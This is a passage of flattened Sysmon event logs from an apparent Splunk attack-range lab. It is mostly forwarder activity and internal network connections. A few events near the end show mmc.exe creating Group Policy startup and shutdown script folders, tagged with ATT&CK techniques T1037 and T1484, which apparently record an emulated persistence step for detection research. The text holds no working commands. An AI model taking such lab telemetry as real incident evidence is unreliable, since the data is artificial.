Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:01.893{C8EA50B7-0F3D-6216-C504-000000003802}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:03.880{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=678D76BFE786FE9AD591AE5F63EFE864,SHA256=F12040073DC65CA79FAB782243D9FD1490C5CAE978A48C1A94E0AB094EAF0808,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:03.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30AB77897412A39FC58960A6ED852EE6,SHA256=E45128E8303E45A9C0114A6B425724D30B9DE9E147A66F3222F768777440B10F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:00.553{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53287-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.927{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C209F3B331123101344EB214CE147B9,SHA256=61885F462FB8931C8B5F21941FF51387AD67C23FDF2112A4CCBAAD37424D4993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:04.461{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=221601D5B0FE1E4BBAE69A1521642A02,SHA256=8D252532BCF8A460FF8D42700DF565A83EB37477A6917FD9F7E8DCDD7731C14B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.661{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CBE4520BE5F2D88F70607BBD5CC2DC6,SHA256=363E0370CE1BB74A61FBED727A3269EF10F791521EB75ED5CAC3D29F1C3F5090,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285946Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F40-6216-C704-000000003802}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285945Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0F40-6216-C704-000000003802}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285942Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.317{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F40-6216-C704-000000003802}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:04.162{C8EA50B7-0F40-6216-C704-000000003802}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:05.989{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284F8708A822A0B739833C82B39631EB,SHA256=5B35019D25A4FECED25284C7F8E3406986892346A1B5B3B160F84C6E8B4855AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:05.571{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4594E659ACB2BABBF38EC0218576B1A,SHA256=28DEBB0F24D8989491410F8381BABBC223D49709FC7FF5BA58BCF6DD9E89D6FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:03.136{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53288-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:03.136{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53288-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000214986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:06.618{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF7DAE77213C76607CE33686060DA09C,SHA256=459C95A2E8BAB7E738ED7C9C52F7F76758D457A1DC49292F8BCE6B45ED0BCFDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:03.540{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51225-false10.0.1.12-8000- 23542300x8000000000000000214987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:07.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE59E9E82BCAB209AB7BFDB5C83530B3,SHA256=1941E4D18930B52D672CB592D7224C7C345C8E3E6D1E78F1CD81402A25F54A2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:07.020{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18AF70D9341BF36718577AC97425D1FB,SHA256=828D57490AF497F307A881DCE0ECEEE79F20E0AC2B8ABAAECCFF51A8C86B2515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214988Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:08.836{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35122A1BD202B16DBB713FEF0E00D31C,SHA256=22F1F1CF4CB1FE7EECB388AB02E03491C5BB32E07C98B5CE0106C5E76577EAC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:05.668{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53289-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:08.052{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08399302B338332D90B95797983BAA9F,SHA256=EF25435F0EC90A0EF30A074C3B9C11F2FDA2DECCA95A58E14BB2B2A21AFEE541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:09.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF4CEB41EEF03666B9D675EA6BAE84A,SHA256=438ABC29CB0AB25310E659F26D77BDC707DCCE0B0A54064250F6D05AA1BE612C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214989Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:10.071{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8ECC7F2EBC8F72AE13D0D7359A39A1E,SHA256=345D9FC28E5ECD9A93C517E8E52F60C622B3165AFDD5D2E335D64014FBEE7468,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:10.098{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0F24FC566B37CEF64E38E528B96B678,SHA256=35393397E74DC6F999FBAEC0CF5172D0E525AA484A461AEF5152E118C61FC30F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:11.114{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DED35C2BAF8325F635673CE73B5F144A,SHA256=D9371BAEF2036E29A75BF077D1165139CF0EF0664F454E139CA4B548D9E4230D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214990Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:11.117{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EAA96471D7CE3C64D9F05CF8C1C212C9,SHA256=CAFABEE41EDB3F5FD4AD4D583134D13B380B2EB7E63445352DC326241FBB1B65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:12.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59FAE9F0344F2A5F060B496B7B946912,SHA256=D4C73B4F1FB916EEC953D70342561F6084893B2617578507C6D431E1CFD8211D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:09.606{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51226-false10.0.1.12-8000- 23542300x8000000000000000214991Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:12.133{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50D09B80641B72E1432B1A0AEC8C496D,SHA256=B5DD1C545BB6441825A016513A3D600FB3B611B7BDE8F0C91B19056C3924AC88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:13.149{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8029AFE40923DB7004C41D3ECE183D0,SHA256=BDEEB5B5691A6934F5DB88798FDD883DE4CB0FE221001CF962A35292AFCF166D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:13.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C76E74FF16561664CF3C7B2023D71D,SHA256=70D557E5A615CA46C3AB94EF5B25522EFBA781D1271ADF4E6D84EC234095F6EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:14.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BD86D0AA3BE1E7134CFAC3A78109963,SHA256=43A9F47969780BBF844B999F557B03C9C593991E2D416A4AF003026070380E7A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:11.574{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53290-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:14.161{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8AC05C16BF664F06ADD6E79409D0C86,SHA256=20E86D2E6CEBEFF4FB89718BCCCC5834A964F9627BB539C83A499BD0C68674CB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000285965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:41:15.630{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Scripts\Shutdown2022-02-23 10:41:15.630 11241100x8000000000000000285964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:41:15.630{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Scripts\Startup2022-02-23 10:41:15.630 11241100x8000000000000000285963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1037,T14842022-02-23 10:41:15.630{C8EA50B7-0F2D-6216-C404-000000003802}1164C:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Scripts2022-02-23 10:41:15.630 23542300x8000000000000000285962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:15.177{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9823EECB5DC65DF17101C6E96B14D3C8,SHA256=949D0195DA06B8B99CC674A7516A1B0442379D272E3825827D455F9A31182E1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:41:15.164{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=079B5874C207A4EAA64FDF2FD7062E81,SHA256=980DDA340AD643AE424ED169534942E9702E277BEBAC8420C55DD02669987181,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:41:16.208{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 